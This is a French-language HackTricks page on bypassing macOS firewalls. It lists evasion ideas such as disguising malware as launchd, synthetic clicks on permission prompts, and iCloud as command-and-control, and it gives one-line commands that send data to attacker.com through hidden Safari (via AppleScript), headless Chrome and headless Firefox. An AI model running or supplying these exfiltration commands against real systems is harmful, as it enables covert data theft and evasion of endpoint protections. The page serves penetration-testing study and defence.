hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

5.6 KiB

Contournement des pare-feux macOS

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Techniques trouvées

Les techniques suivantes ont été trouvées fonctionnant dans certaines applications pare-feu macOS.

Abus des noms de liste blanche

  • Par exemple, appeler le malware avec des noms de processus macOS bien connus comme launchd

Clic synthétique

  • Si le pare-feu demande la permission à l'utilisateur, faire en sorte que le malware clique sur Autoriser

Utiliser des binaires signés Apple

  • Comme curl, mais aussi d'autres comme whois

Domaines Apple bien connus

Le pare-feu pourrait autoriser les connexions à des domaines Apple bien connus tels que apple.com ou icloud.com. Et iCloud pourrait être utilisé comme C2.

Contournement générique

Quelques idées pour essayer de contourner les pare-feu

Vérifier le trafic autorisé

Connaître le trafic autorisé vous aidera à identifier les domaines potentiellement inclus dans la liste blanche ou les applications autorisées à y accéder.

lsof -i TCP -sTCP:ESTABLISHED

Abus de DNS

Les résolutions DNS sont effectuées via l'application signée mdnsreponder qui sera probablement autorisée à contacter les serveurs DNS.

Via les applications de navigateur

  • oascript
tell application "Safari"
    run
    tell application "Finder" to set visible of process "Safari" to false
    make new document
    set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • Google Chrome

{% code overflow="wrap" %}

  • Google Chrome
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • Firefox

Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via injections de processus

Si vous pouvez injecter du code dans un processus autorisé à se connecter à n'importe quel serveur, vous pouvez contourner les protections du pare-feu :

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

Références

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥